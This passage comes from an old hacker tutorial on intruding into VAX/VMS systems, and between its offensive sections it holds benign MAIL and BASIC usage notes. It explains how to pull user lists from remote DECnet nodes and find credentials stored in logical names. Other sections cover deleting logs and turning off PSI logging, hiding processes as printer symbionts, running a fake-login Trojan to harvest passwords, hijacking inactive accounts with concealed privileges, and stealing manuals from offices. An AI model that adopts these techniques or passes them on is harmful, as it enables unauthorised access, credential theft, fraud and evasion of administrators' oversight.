2.161 NORTELCOM        0         0      0     Local   ->  2.161 NORTELCOM

2.6 JANUS              0         3      3     UNA-0   ->  2.6   JANUS

2.2 LUMPY              0         9      5     UNA-0   ->  2.2   LUMPY

2.3 SBSU               0         5      4     UNA-0   ->  2.3   SBSU

2.4 AURORA             0         4      4     UNA-0   ->  2.4   AURORA



 Total of 5 nodes.





This is a sample output that you would see on your screen.  Let me give a brief

explanation of what each column means.  The first column shows the node address

and the NodeName.  The node name is the most important to the VAX hacker since

that is how you will be contacting the remote node.  LINKS shows the number of

logical links between the local node and each available remote node. COST shows

the total line cost of the path to a remote node.  HOPS shows the number of

intermittent nodes plus the target node.  NEXT HOP TO NODE shows the outgoing

physical line used to reach the remote node.



The important item from this list of course is the node name. By referencing

this you can connect to other nodes.  A nice technique that allows you to get

user accounts on other nodes without actually having access to the node employs

this idea. For example, if you want to find out the user list of a node SBSU,

you could type:



$copy sbsu::sys$system:rightslist.dat sys$login



This will then transfer the rightslist from the other node to your login

directory, giving you a list of all the users on the other system that you can

hack out.



It should be noted that copying files from another node will create a file

on the remote node indicating your transfer.  To get rid of this, log onto the

remote node and delete the file called NETSERVER.LOG   (just delete the file

versions that you have created, and leave the others alone!)



There is another useful trick that sometimes yields more USER accounts on other

systems.  Try typing:



$show logical



This will present you with a giant list of what seem like symbol equates. What

you should look for in here is something that accesses a file in another system

eg.



"mainuaf"=sbsu::sys$system:sysuaf.dat



Many times, a user/password combination is hidden among these definitions. To

find these, simply search the file for occurrences where they have a nodename

such as SBSU followed by a quote and some info. An example:



"mainuaf"=sbsu"system manager"::sys$system:sysuaf.dat



The important part is the info in quotes after the node name. The first item

(before the space) is a username, and the word after the space is the password.

It is rare to find such an occurrence, but it should not be overlooked, since

it can sometimes yield high system level accounts.  In this example, node SBSU

has a user called SYSTEM, who's password is MANAGER.







DECNET and PSI

--------------



If you do a SHOW NET and it gives you a list of other nodes, you can connect to

these nodes using the SET HOST command. For example to connect to node SBSU:



$set host sbsu



This will then connect you to SBSU, and you have to go through their login

procedure also.  An interesting trick to note is, lets suppose that you have

hacked an account out on node SBSU.  What you want to find out is the DATAPAC

or TELENET address of the machine.  To do this use:



$mc ncp tell sbsu sh known dte



This will then give you the address of the machine, so that you can call it

directly rather than through this VAX.  You may want to do this to increase

speed, since obviously calling through another VAX slows things down a bit.



Another method which often works is to use the SHOW LOGICAL command.  By

specifying a certain table, you can sometimes get a list of the NUAs of the

other nodes in the same cluster as your node.  To do this type:



$show logical/table=*psi*



An alternative method which is a bit messy and requires higher privileges is to

type out the NETCIRC.DAT file. ie:



$type sys$system:netcirc.dat



On all the systems that I have seen, none of them had WORLD READ access to this

file, so it is not possible to read this with just TMPMBX and NETMBX privileges.



Many times you will want to call a phone number to another machine. To do this

use:



$set host/dte txa0: /dial=number:5551212



This command will dial out to 555-1212 using the terminal TXA0:  To dial out a

phone number, you MUST specify a terminal that is hooked up to a modem.  To

find out which terminals have modems type:



$show device



This will give you a list of devices hooked up to the VAX. Devices are 4

character strings followed by a colon (:) The terminals that you can use are

usually further down the list.  To test the terminal for a modem, use the

following line, which also illustrates the importance of lexicals:



$write sys$output f$getdvi("txa0","tt_modem")



This above line would test the terminal TXA0: to see if it has a modem attached

If it responds with TRUE, then you have a modem, otherwise not. Note that you

must put the terminal name in quotes, and also that you DO NOT enter the colon.



If the VAX you have hacked onto is hooked up on a packet switching system such

as DATAPAC or TELENET, then there is another USEFUL thing you can perform. To

call out NUA's use the /X29 qualifier. For example:



$set host/x29 026245400050570



This would call up the NUA 026245400050570 (altos:tchh).  What is interesting

to note is that on many VAX's you can call out to foreign remote nodes such as

in the example and the charge for the collect call is placed to the account

through which you are logged in as.  This is a safe and easy method to call out

to PSDN's which are normally long distance from you.  It should be noted that

many system managers turn off foreign DNICs, which may limit you to calling

only within your local DNIC.

 One precaution you may want to take when using the SET HOST/X29 command is to

turn off logging.  Although this is usually turned off, some system managers

may buffer everything you type in and keep it in a file. To temporarily turn

the logging off, try this:



$run sys$system:psipad



It will then ask for NODE:  just hit RETURN, then:



PSI>show log_file



this will either say that buffering is off or it will give you a filename with

a directory path. If it is not off then make a note of the file, then type:



PSI>set nolog_file



This will turn off the buffering. After you are through with the remote session

be sure to turn it back on with:



PSI> set log_file xxxx:[xxxx.xxxx]xxxxx.xxx



All the xxx's represent the full filename path that you initially wrote down

when you did the SHOW LOG_FILE command.



 I want to point out another interesting trick that sometimes works on certain

accounts. Many a time i have encountered an account on a Vax which would simply

allow you to call out to another node. It had no other purpose, and would

refuse to give you DCL access.  If you encounter such an account and it asks

you to enter a nodename, try putting /x29 NUA.  This technique allows you to

dial out to remote systems via some PSS even though you do not have DCL access!

An example:



Enter nodename> /x29 026245400050570



If /X29 isn't disabled, this will allow you to call that NUA.



One thing to note is that not all systems allow you to call out using these

methods. Some have /x29 disabled, others have /dial disabled etc.  In order to

overcome this barrier, it is important to know which files are involved.  If

you want to dial out, you MUST have the modem files (such as DMCL). If you want

to dial out across a PSS, you must have the PSI utility files, and lastly if

you wish to dial out to another node in the cluster you must have RTPAD.EXE on

the local node and REMACP.EXE and RTTDRIVER.EXE on the remote node.



One quick note about finding other VAXes that have PSI utilities on them. Often

you may want to hack only those VAXes that have PSIPAD on them.  To determine

if a particular VAX in your cluster has the capability, issue the command:



$dir NODE::sys$system:psi*.*



NODE stands for the nodename that you want to check.  If this returns with a

message that no files match, then this particular VAX does not have PSI

installed.  If on the other hand it returns with several file names, then it

does have the PSI utilities installed.



This is just a VERY brief overview of the DECnet setup on VAX/VMS systems.  For

a more detailed analysis, look for my other file: 'Understanding DECnet and

NCP'







HIDING ON THE SYSTEM

--------------------



There are several methods that allow you to remain undetected once you have

hacked onto a VAX.  One of the most important things is to leave things as they

are, in other words, do not delete files or subdirectories.  You should also

avoid leaving suspicious looking COM or EXE files that you may have created.



An important ability to have is being able to hide from SHOW USER. There are

several ways of going about this, but the simplest is to become a

non-interactive process. Or to become a subprocess of some other

non-interactive process such as a BATCH or NETWORK process.  Although this will

hide you from SHOW USERS, you will still be visible if someone did a SHOW

SYSTEM. To get around this you should also specify your process name to a

printer driver or something. For example:



$show system



Look for the process that has a name of "SYMBIONT_xxxx" where xxxx is a number.

These are the printer drivers on the system.  Look for the last number on the

list and then change your own process to one higher than this number.  For

example if the last printer is 5 then type:



$set proc/name="SYMBIONT_0006"



At the end of this file i have enclosed a small 20 line assembler program that

you can enter through EDIT.  It allows you to hide from SHOW USER by changing

your process to an OTHER non-interactive process. After you assemble the file,

link it and then execute it using the RUN command. You should then copy this

file to some rarely used directory, where no one else will notice it.



OTHER PROCESSES

---------------



  So you have hacked your way in, and everything is going smooth. Now you want

to find out what all the other people on the system are doing.  There are

several ways of finding out who else is using the system and what they are

doing. Here i will outline some of the basic methods.

  Perhaps the simplest command that you can issue to see who else is logged in

is the SHOW USER command.



$show user



a typical output might look like:







            VAX/VMS Interactive Users

              1-SEP-1989 12:48:51.14



       Total number of interactive users=5



   PID        Username    Process Name     Terminal



202000B3      DELUCAJ     DELUCAJ          VTA21:      TTA7:

204000C4           _vta13:          VTA13:      LTA8:

20400138      OPERATOR    system monitor   VTA17:      OPA0:

2040013D      POLLACK     POLLACK          VTA11:      TTB0:

204000BC      ENTITY      FUK YOO          VTA15:      TTA1:





Ok so what does all this mean?! Well lets go one column at a time. The first

column gives you your process identification number. This is a unique number

that is assigned to each process as it logs in.  The number itself really

doesn't matter, however it is required for certain commands.  The next column

is the username of the process. This always puts the name of the account that

you logged in with.  Sometimes you may notice that instead of a name it says

   This indicates that someone is currently going through the login

procedures under that PID.  The next column is the process name. This is

defaulted to be the same as your username, but can easily be changed. For

example:



$set proc/name="Hacker!"



This will set your process name to Hacker!  Since everybody will see this when

they do a SHOW USER command, it is not recommended that you choose something

that will give you away. In general, you leave this as the default.  The next

column shows the virtual terminal that you are logged into.  The last column

shows the physical terminal that you are logged into. It is important to check

this last column.  You should check to make sure that nobody is logged in under

OPA0:  Anyone logged in under this is using the system console, which means

that they could possibly be watching you!  Another one to note is RTxx: which

indicates a process that is remotely logged in (ie calling in from another

VAX or something)  Other things that you should watch out for are users who are

logged in under the SYSTEM account or any other high-privileged accounts.  Any

one of OPERATOR,OPER,SYSTEM,SYSMGR etc could mean trouble for the hacker.



 One thing that you may notice on some systems is that a process will be logged

on ALL the time under the OPA0: terminal.  What's going on?! Is the system

manager there all the time?  No. What happens on many systems is that the

system manager logs into his terminal, and doesn't bother logging out at the

end of the day, leaving his process running often for weeks at a time.  There

is no easy way to know if the guy is really there or not.  There are two things

you can do. One is to check the time that the account has been IDLE, but there

is no easy way to check this without going into some programming.  The next

best you can do is issue the SHOW SYSTEM command.  This will show all the

processes currently running, their priority levels, how much CPU time they are

eating up etc. A typical report may look like:



$show system



VAX/VMS X2EN  on node DELPHI  01-SEP-1989 15:10:31.02   Uptime   0 12:06:30



  Pid      Process Name   State  Pri     I/O      CPU        Page flts  Ph. Mem



22200080   NULL           COM    0         0    0 16:34:12.00        0        0

22200088   SWAPPER        HIB    16        0    0 00:03:52.53        0        0

22200113   ENTITY         LEF    4     16505    0 00:00:12.02     8689      233



                               :

                               :

                               :

                               :



                            etc etc







This display can give you several important pieces of information about other

processes. The explanation of each column:



PID       - the process identification number

Proc Name - the name of the process. Note that certain non-interactive system

            processes such as NULL, SWAPPER, ERRFMT etc are always running in

            background.

STATE     - This is important.  This tells you what the process is currently

            doing.  HIB-hibernating, COM-computing, LEF-active, CUR- current

PRIORITY  - the higher the priority number, the higher priority it has in terms

            of accessing CPU time.

I/O       - Shows the accumulation of the direct I/O and buffered I/O

CPU       - the total amount of CPU time the process has used so far

PAGE FLTS - page faults, number of exceptions generated. Not very useful...

PH. MEM   - amount of physical memory that the process occupies



A further thing you may notice after the last column on some processes is a

single letter. This is the process indicator, and it can be one of:



B - batch job

S - subprocess

N - network process





Another useful option is the ability to know which files, each of the processes

are accessing. To accomplish this type:



$show devices/files/nosystem



The only problem with this command is that it will not show the filename if you

do not have read access to it. (or the BYPASS privilege)



Perhaps the most POWERFUL tool that the VAX/VMS hacker has is the System Dump

Analyzer (SDA).  An important option of this allows you to view all the process

running on the system, what files they are accessing, their process status,

the contents of their virtual memory (such as keyboard buffer) etc etc  A VERY

powerful command, it is started with the command:



$analyze/system



The only drawback with this command is that it requires the CMKRNL privilege.

I will discuss this feature in more detail later in the file.







DETACHED ACCOUNTS

-----------------



A very big security loophole which is allowed on many VMS systems are detached

accounts.  Basically what this allows you to do is cut carrier instead of

logging out properly.  Instead of logging the process out, it is left waiting

on the system.  The next user who logs in, instead of getting a Username prompt

will get your shell ($) prompt!  There are many useful things you can do with

a detached account.  The most obvious use of course is to set up a Trojan Horse

program. Basically you write a procedure that simulates the VAX/VMS login

sequence.  After the user enters his/her username-password, you save this info

to a file, give him a 'User authorization failure' and throw him into the real

login sequence.  He will think he mistyped something and this time when he

tries, he will be able to log in normally. But in the meantime, you have a copy

of his username/password combination stored away in a file, which you can later

use!







EXAMINING FILES

---------------



Often it becomes necessary to examine a file in greater detail than provided by

a simple TYPE command.  For executable and object files there is of course the

ANALYZE/IMAGE and ANALYZE/OBJECT commands, but often you want to have a look at

each individual byte in the file.  The best way to do this is to use the DUMP

command.  An example:





$dump test.dat





DUMP of file DISK0:[NORMAN]test.dat  on  15-APR-1989  15:43:26.08

File ID (3134,818,2)   End of file block 1 / Allocated 3



Virtual block number 1 (00000001), 512 (0200) bytes



706d6173 20612073 69207369 68540033 3.This is a samp 000000

73752065 62206f74 20656c69 6620656c le file to be us 000010

61786520 504d5544 2061206e 69206465 ed in a DUMP exa 000020

00000000 00000000 0000002e 656c706d mple............ 000030

00000000 00000000 00000000 00000000 ................ 000040



                     :

                     :

                     :



00000000 00000000 00000000 00000000 ................ 0001E0

00000000 00000000 00000000 00000000 ................ 0001F0





As you can see, this not only shows the ASCII interpretation, but also the HEX

value for each byte.  This can be VERY valuable in certain situations.  You

should note that since the default is HEXADECIMAL LONGWORD, the bytes seem to

be in a backwords order.  This is due to the way the machine stores numbers in

memory: Lo-byte,LSB,MSB,Hi-byte.  You can optionally specify the numbers to

come out in decimal or also in single byte format.  Example:



$dump sbsu::sys$system:rightslist.dat /byte/header/decimal



See the online HELP files for more detail into the various qualifiers. You

should note that you CAN use dump to access files on OTHER nodes!





CREATING TEXT FILES

-------------------



  This isn't the best of places to put this topic, but if I don't do it now, I

will probably forget later on, so here goes...

  Often you will need to create files on a system, such as messages to other

hackers, notes to yourself, small DCL programs etc. The basic method is as

follows:



$create file.txt



   Hi this is a dumb message that i am typing just to

   see how this command works.



   



$



Basically what is happening here is you specify a filename and an extension

when using the CREATE command (in this case file.txt) and then the system waits

there for you to type in something.  At this point you can type whatever you

want, and to end the message/program/memo just hit CTRL-Z. This will return you

to the DCL prompt.  This is an easy method to transmit COM files that you have

either created or buffered from some other system.  Just issue the CREATE

command, send the file through your buffer, then hit CTRL-Z to finish it off.







VAX/VMS MAIL SYSTEM

-------------------



  Although it is not a good idea to use the MAIL system to send or receive

messages (since the messages can be read by anyone with enough privs) I will

present a brief list of what it can do.  One important thing to note is that

whenever there are MAIL messages waiting to be read, they are stored in a file

that ends with the MAI extension.  So if the account you have logged into has

received mail, and you really want to read it for some reason, then you can do

the following from DCL:



$type mail.mai



This file is not necessarily called MAIL.MAI, it could be any other name with

a MAI extension.  Aside from some header information stored at the beginning

of each message, the rest of the message is mostly in standard ASCII and easily

readable.  Doing it this way ensures that the message remains there for the

REAL user when he logs in. (after a message has been read, it is put into

another area, and the user will not see it.  This could make him suspicious if

he keeps losing important mail messages!)

  Reading MAIL files can be quite useful, because sometimes important messages

are stored here.  Like i stated earlier, you shouldn't be actually using MAIL

to read the mail since it will then get deleted, and the actual user will

eventually notice.  Also, you shouldn't use the MAIL system to send

hacker-related information (to other hackers) because system managers can

access your mail and read what you have to say.

  Basically you can use the MAIL facility in two ways: Interactively and

through the shell.  For ease of use I will only describe the interactive method

since it is easier and more flexible.  If you insist on doing it from the

shell, then just call up the ONLINE HELP for the qualifiers.  In any case, to

interactively use the MAIL utility type:



$mail



This will respond with the prompt:



MAIL>



At this point you can enter the various mail commands.  Following is a brief

overview of the more important commands and concepts.  At the end, I have

provided a table with all the possible commands that can be entered here.







Heres a brief list of the more important MAIL commands that I will discuss here





         SEND        DIRECTORY     EXTRACT

         READ[/NEW]  DELETE        PRINT

         FORWARD     MOVE          HELP

         REPLY       SELECT        EXIT



The first command to try is the SEND command.  Try sending a message to

yourself Enter the SEND command and press RETURN.  Enter your own user name at

the prompt and press RETURN.  Enter a subject at the prompt and press RETURN

again. The following example shows how to use the SEND command:



MAIL> SEND

To:PIERCE

Subj:Sailing

Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:



When you finish entering the text of your message, press CTRL-Z. Because you

are sending the message to yourself, MAIL signals that you have just received a

new message by displaying the following message:



New mail on node FLAXEN from PIERCE



MAIL>



Now, you are ready to use the READ command.  To read the message you just sent

to yourself, enter the READ command with the /NEW qualifier and press RETURN as

follows:



MAIL> READ/NEW



You must specify the /NEW qualifier with the READ command when you want to read

new mail that arrives while you are in the Mail Utility.  When you are not in

the Mail Utility and you receive new mail, invoke MAIL to read the new message,

you can enter the READ command without the /NEW qualifier.  Or, if you wish to

read mail that you have already read, you can enter the READ command.



You can forward a copy of a mail message to another user by entering the

FORWARD command.  MAIL prompts you for the name of the user to receive the

message. Try forwarding a copy of the message you just received back to

yourself. Enter your own user name and press RETURN.  Supply a subject when

prompted and press RETURN MAIL signals that you have just received a new

message. Enter the READ/NEW command to read the forwarded message.



When you receive a message and want to respond to it, enter the REPLY command

and press RETURN.  MAIL displays the header information as follows:



MAIL> REPLY

To:FLAXEN::PIERCE

Subj:RE: Using the REPLY command

Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:



When you finish typing your response, press CTRL-Z.  Again, MAIL signals that

you have just received a new message.  To read the message, enter the READ/NEW

command.



When you want to see a list of all the mail messages you have collected, enter

the DIRECTORY command and press RETURN.  MAIL displays a list like the

following:



         # From             Date                  Subject



         1 FORBES           1-SEP-1989            How to Write a Memo

         2 SBSU::BERT       2-SEP-1989            Using the Printer

         3 FROST::BASTIEN   4-SEP-1989            Chicken Kiev





When you want to remove a message, use the DELETE command.  You can either

enter the DELETE command while you are reading the message or you can enter the

DELETE command followed by the number of the message you want to remove.  To

remove the second message in the list, enter the following command line:



MAIL> DELETE 2



If you enter the DIRECTORY command after you have deleted a message (or

messages), you see the messages marked for deletion, as follows:



         # From             Date                  Subject



         1 FORBES           1-SEP-1989            How to Write a Memo

         2 (Deleted)

         3 FROST::BASTIEN   4-SEP-1989            Chicken Kiev





When you exit from MAIL, the messages marked for deletion disappear.



The Mail Utility allows you to organize your messages by moving them into

folders.  To move a message to a folder, enter the MOVE command (while you are

reading the message) and press RETURN.  MAIL prompts you for a folder name.

Type any name, for example, REVIEWS or JOKES or STATUS_REPORTS.  MAIL also

prompts you for a file name.  You can specify the default mail file by pressing

RETURN.  A sample session demonstrating the MOVE command follows:



MAIL> 2

MAIL> MOVE

_Folder: HACKERS

_File: 



Folder HACKERS does not exist.

Do you want to create it (Y/N, default is N)? Y

%MAIL-I-NEWFOLDER, folder HACKERS created



In this example, the folder name is HACKERS and the default mail file is

specified.  If the folder you name does not exist, MAIL asks you if you want to

create it.



Once you have created folders, you may want to move between them. To move from

one folder to another, use the SELECT command.  If you want to move to the

HACKERS folder, enter the SELECT command as follows:



MAIL> SELECT HACKERS



%MAIL-I-SELECTED, 1 message selected



In this example, MAIL displays a message indicating the number of messages in

the folder.



To move to a folder named JOKES, enter the following command line:



MAIL> SELECT JOKES



%MAIL-I-SELECTED, 32 messages selected





You can enter the DIRECTORY command to see a list of the messages in the folder

you just selected.



When you want to move a mail message from your mail file to a sequential file

that you can access from the DCL command level, use the EXTRACT command.

Enter the EXTRACT command (while you are reading the message) and press RETURN.

MAIL prompts you for the name of a file.  Then, when you exit from MAIL, the

file is listed in your directory.  The following example shows how to use the

EXTRACT command to move a mail message to a file named GAMES.DAT.



MAIL> EXTRACT

_File: GAMES.DAT



%MAIL-I-CREATED, DISK:[BERGMAN]GAMES.DAT;1 created



MAIL>



To print a hard copy of a mail message, enter the PRINT command while you are

reading the message and press RETURN.  (When you exit from MAIL, the message

enters the print queue.) The following example shows how to make a hard copy of

message #4 by using the PRINT command:



MAIL> 4



    #4          4-AUG-1989 09:39:20           MAIL

From:  SPARTA::FELLINI

To:    MARSTON

Subj:  Rydell's Reasons



In reference to the meeting of July 26, I would like to explain

Rydell's opinion more fully...



MAIL> PRINT



When you are ready to leave MAIL, enter the EXIT command and press RETURN.

Any messages marked for deletion disappear.  Any messages marked for printing

enter the print queue and the following message is displayed:



MAIL> EXIT

Job MAIL (queue ATLAS_PRINT, entry 43) started on QUEUE$LPA0





The next section is a detailed look at what is possibly the  most important of

the MAIL commands -- SEND



Format:   SEND  [filespec]



Sends a message to another user(s).  Use the SEND command and the MAIL command

interchangeably because they work the same way. MAIL prompts you first for the

name of the user(s) to receive the message.  You reply with the user name(s)

or with the file name of a distribution list file(s), in the following format:



[[nodename::]username,...] [,] [@listname[,...]]



If you have entered the SET CC_PROMPT command or used the /CC_PROMPT qualifier,

you can then specify names of users to receive carbon copies of the message at

the CC: prompt.



Next, MAIL prompts you for the subject of the mail.  To avoid the "Subj:"

prompt specify the /SUBJECT qualifier with the SEND command.



You can include a file specification with the SEND command.  If you specify a

file with the SEND command, the text in that file is sent to the specified

user(s).  If you do not specify a file, MAIL prompts you for the text of your

message.



Enter the message that you want to send; then press .  Note that once

you have typed a line and pressed RETURN, there is no way to edit it. If you

decide not to send a message you are typing but want to stay within the Mail

Utility, press  to abort the message.  You then receive the MAIL>

prompt.  CTRL-Z exits you from MAIL.





Examples

--------



1.

   MAIL> SEND/LAST

   To:FLIGHT::MYERS

   Subj:Geometric Concepts

   MAIL>





This example shows how to send a copy of the last mail message you sent to a

user named Myers on node FLIGHT.



2.

   MAIL> SEND/SELF/SUBJECT="Good Harbor"

   To:DAPPER::WAYNE

   Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:





This example shows how to send a mail message to a user named WAYNE on node

DAPPER.  The /SELF qualifier enables MAIL to send a copy of the same message

back to you.  The subject of the  message  is  Good Harbor. Since the /SUBJECT

qualifier was specified, there is no Subject: heading.



3.

   MAIL> SEND

   To:BAKER,MARSTON,@SUPERVISORS

   Subject:Handling Stress

   Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:





This example shows how to send a mail message to two users (BAKER and MARSTON)

and a distribution list (SUPERVISORS).



One of the important concepts relating to MAIL is the idea of FOLDERS.  All

mail files are subdivided into folders.  By default, your mail file (MAIL.MAI)

contains a folder called MAIL.  The MAIL folder contains messages that you have

already read.  When you receive new mail messages, they automatically enter

into a folder named NEWMAIL.  After you read the messages in the NEWMAIL

folder, they automatically move into the MAIL folder and the NEWMAIL folder

disappears.  When you delete a message it automatically moves into the

WASTEBASKET folder.  Deleted messages collect in the WASTEBASKET folder until

you empty it.  To emtpy the WASTEBASKET, enter either: EXIT or PURGE You can

create as many folders as you want.  You always know which folder you are

currently in because the name of the folder is displayed at the top right

corner of the screen when you enter the READ or DIRECTORY command.  You can

enter the DIRECTORY/FOLDER command to see a display of the existing folders in

the current mail file.  (use the MOVE command for creating new folders) You can

remove a folder by deleting all the messages that it contains.



A look at a sample MAIL heirarchy:





       [mailfile1]        [mailfile2]                 [mailfile3]

            !                  !                           !

            !            +-----+---------+            +----+---------+

        [folder1]    [folder1]        [folder2]       !              !

            !            !               !        [wastebasket]  [folder1]

            !          +-+-----+       message1       !              !

         message       !       !                   garbage1       message1

                   message1  message2





                          MAILFILE ---> FOLDERS ---> MESSAGES







MAIL COMMANDS OVERVIEW

----------------------



Here I have provided a listing of all the commands that you can issue from the

mail utility and a brief description of what each one does:





Command            Description

-----------+-------------------------------------------------------------------

ANSWER     ! Same as the REPLY command.  See below

ATTACH     ! Allows you to switch to another process in your job

BACK       ! Displays the last message read

COMPRESS   ! Makes an indexed sequential mail file smaller

COPY       ! Copy a message to another folder, without deleting original

CURRENT    ! Displays the beginning of the message you are currently reading

DEFINE     ! Allows you to define keys as macros

DELETE     ! Delete a message

DIRECTORY  ! Displays a list of the messages in the current folder

EDIT       ! Enables you to edit a message before it is sent

ERASE      ! Clears the screen

EXIT       ! Exits from the MAIL utility

EXTRACT    ! Places a copy of the current message into a sequential file

FILE       ! Moves the current message to the specified folder

FIRST      ! Displays the first message in the current folder

FORWARD    ! Sends a copy of the message you just read to another user

KEYPAD     ! Define the keypad

LAST       ! Displays the last message in the current folder

MAIL       ! Sends messages to another user.  Identical to the SEND command

MOVE       ! Moves the current message to the specified folder

NEXT       ! Skips to the next message and displays it

PRINT      ! Dumps messages to the PRINTER

PURGE      ! Deletes all messages in the WASTEBASKET folder

QUIT       ! Quits MAIL without deleting messages in WASTEBASKET

READ       ! Displays your messages

REPLY      ! Sends a message to the sender of the message you are reading

SEARCH     ! Searches the current folder for the message containing a string

SELECT     ! Allows you to switch to another folder

SEND       ! Send a message to another user

SET-SHOW   ! Review or Modify various characteristics of the MAIL utility

SPAWN      ! Create a sub-process.  Often useful to the hacker...

-----------+-------------------------------------------------------------------





COMPILING PROGRAMS

------------------



Once you are comfortable with the VAX/VMS operating system, you will probably

want to write yourself some useful little hacker utility programs.  Although

many can be simply written as DCL script files, often the occasion arises where

the use of a high-level language is necessitated.  Through a high-level

language you have full access to the system services, as well as a lot more

control of what you want the VAX to do.  Here I will very briefly show how to

write, compile and execute a basic program.  Creating executable files in other

languages follows the same overall procedures: To activate basic from the shell

type:



$basic



This should put you into the VAX-BASIC environment, and the terminal will print

READY on your screen.  If just typing BASIC doesn't work, you may want to try:



$mc basic



This sometimes works, but it should be noted that BASIC is not found on all

VAX's.  Some have it, some don't.  In any case, whenever you are editing a

program, you should never leave source code lying around.  The best way is to

edit the file on an online buffer editor, and then transmit the file.  It

should always be done in this manner unless your file is VERY large, and it

would be cumbersome to keep uploading it.  If you must, then to save your

creation onto the VAX, just type:



save "filename"



This will save the source code with a .BAS extension.  You should rename this &

hide it in some seldom checked directory.  After you have finalized your coding

you should create an executable file, download your source code, and then

delete the one online.  To create an executable file, first you must exit back

to DCL, do this by typing EXIT.  Then once in DCL type:



$compile filename.bas

$link filename

$delete filename.obj;*



Note that you can link multiple OBJ files together, just like in MS-DOS.  It

should also be noted that to create truly useful programs you will need to get

your hands on a system services manual.  Through the system services you can

gain all kinds of information about the system and any nodes that it is hooked

up to.



NOTE: type HELP in BASIC to get a complete list of all the commands and syntax





ATTAINING MANUALS

-----------------



    As you can see, if you are going to get anywhere, you will have to get your

hands on some manuals.  Perhaps the best book you should invest in is "VAX/VMS

INTERNALS AND DATA STRUCTURES".  This book concentrates on explaining all the

data structures as well as all the system service calls and how everything

basically works inside a VAX.  Once you have read and understood this book,

VAX/VMS kernal programming should become a snap.  Its available at most big

bookstores but it costs about $130 (Canadian funds).  You may also want to look

at your local library or University library, since they usually carry this book

and other ones you may want to grab. Aside from these places the next best

place to get major information is from the actual VAX/VMS manuals.



Unfortunately these cannot be bought at any store.  However there are several

ways you can get your hands on one.  One method is to go work at a company

during the summer that uses VAX'es.  Then just grab the manuals or better yet,

photocopy them.  (be forewarned though.  Theres several thousand pages worth of

useful info!) Or if you know someone else who works at such an establishment,

you can get them to heist the manuals for you.  Other good techniques are

taking guided tours of offices of large corporations.  This is the BEST method,

because you can usually pick up a lot of stuff.  Just make sure you go with a

friend (to distract the guide, lookout etc) and carry a school bag with you.

When they get to the computer room, start looking around.  Usually they will

have the manuals in some big shelf somewhere.  Just grab yourself whatever you

need.  Also keep a lookout for other useful info laying around such as system

accounts, dialups etc If you really need to find the number of a VAX and you

don't see it posted anywhere, then you should get yourself a cheap little

phone.  (you know those K-MART $4.99 jobs) Take the phone plug out of the jack,

plug in your phone and dial up your local ANI.  This will give you the phone

number to the dialup.  It should be noted that not all VAX's allow remote

logins.  This can be adjusted from the SYSUAF setup via the AUTHORIZE program.



Local ANI's for TORONTO are:



997-8123

997-1234

997-1699



If you don't have any Local ANI's, then just ask around on your local

PHREAK/HACK boards.







CREATING/MODIFYING ACCOUNTS

---------------------------



The job of creating, modifying and deleting users is performed via the image

AUTHORIZE.  This program is always found in the sys$system directory, and

requires at least the SYSPRV privilege.  If you do not have this (or SETPRV)

then you cannot execute this file.  Assuming you have hacked out an account

with the required privilege or you have via some mechanism boosted your privs,

then this is how to start up AUTHORIZE:



$sd sys$system

$run authorize





This will return you with the UAF prompt:



UAF>



At this point you can make modifications to the User Authorization File (UAF).

It should be noted that the two files that this program accesses are SYSUAF.DAT

and RIGHTSLIST.DAT, and both of these are found in the SYS$SYSTEM directory.

First, heres the quick and dirty way to create a new user:



UAF> add username /password=whatever/priv=setprv



This is basically the minimum requirements for creating a high-privileged user

on a system.  Of course, you should try and avoid adding new users in where

possible.  It is a much better idea to try and find an INACTIVE user who hasn't

logged in for quite a while and change their password to whatever you want.

This way, any system operator will not get suspicious because of a new

username.  In addition, when granting privileges to either your own user, or

modifying some other user, you should NEVER give them ALL privs.  The reason is

simple: IT STANDS OUT!  Anybody going through the sysuaf database can

immediately pick out such accounts, and you will be found out very quickly.  If

you must give all privs then the better way is to simply grant the SETPRV

privilege as the normal privilege.  (do not assign it as a default however) The

reason for this is that this will not stand out as much.  By not assigning it

as a default, if the real user happens to log in for any reason, they will not

see it as one of their privs when performing a SHOW PROC/PRIV.  The only way to

activate your hidden privileges is by issuing:



$set proc/priv=all





Here I will briefly outline the commands you can perform from UAF:



Command  Description

-------------------------------------------------------------------------------

ADD    !This as you know will add a new user. You may specify many qualifiers

       !when creating the account.  See the online HELP for further information.

COPY   !Allows you to copy any record in the UAF to a new user.

CREATE !Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT files if

       !they don't already exist.

DEFAULT!Allows you to change any item in the DEFAULT record in SYSUAF.DAT

EXIT   !Terminate authorize and go back to the VMS shell.

GRANT  !Grants an identifier name to a user UIC

LIST !Makes a listing file (SYSUAF.LIS) which gives information on the records

!specified.  MODIFY !Allows you to modify an existing user.  see below for

further discussion REMOVE !This allows you to delete an existing user record

RENAME !This allows you to change the username of a record REVOKE !Revokes an

identifier name from a username or UIC identifier SHOW !Allows you to view the

records in SYSUAF.DAT, RIGHTSLIST.DAT and !NETUAF.DAT

-------------------------------------------------------------------------------



The commands you will be using most from here are SHOW and MODIFY.  Show can be

used to isolate INACTIVE accounts (based on last login), failed login attempts

etc.  The MODIFY command will let you change any characteristic in any of the

records.  Below I will give a short discussion on some of the more important

qualifiers that can be specified.  Note that exactly the same thing applies to

the ADD command:



/ACCESS  -if the account is set up for no remote access or whatever, just

          include this qualifier (no parameters) to gain FULL access.

/DEFPRIV -your default privileges.  These are the privileges that are active

          upon login

/DIR     -the directory assigned to you upon login.  ie.  SYS$LOGIN

/DEVICE  -the drive that the directory is in.

/FLAGS   -this is an important one!  You can specify things such as CAPTIVE

          accounts, NODISUSER, and many others.

/LGICMD  -the file that is executed upon login.  Normal setting would be

          /LGICMD=login.com

/PASSWORD-primary password

/PRIORITY-CPU priority. Normal setting is 4

/PRIV    -your assigned privileges. Should NOT use ALL, very conspicuous.

/PWDMIN  -minimum password length

/UIC     -User Identification Code





On most systems you will find a file called ADDUSER.COM which allows the system

manager to create new users.  It is a DCL file which simplifies the task of

creating new users by prompting you for all the necessary parameters.  If this

file does not exist on the system, here I have outlined the manual method of

creating a new user (this is the FULL setup):



$sd sys$system

$run diskquota



NOTE: All variables that you must enter are in square brackets, eg. [uic]



QUOTA>add [uic] /perm=[quota]/overdraft=[overdraft]



Basically this sets up how much disk space is allotted to the user.  The quota

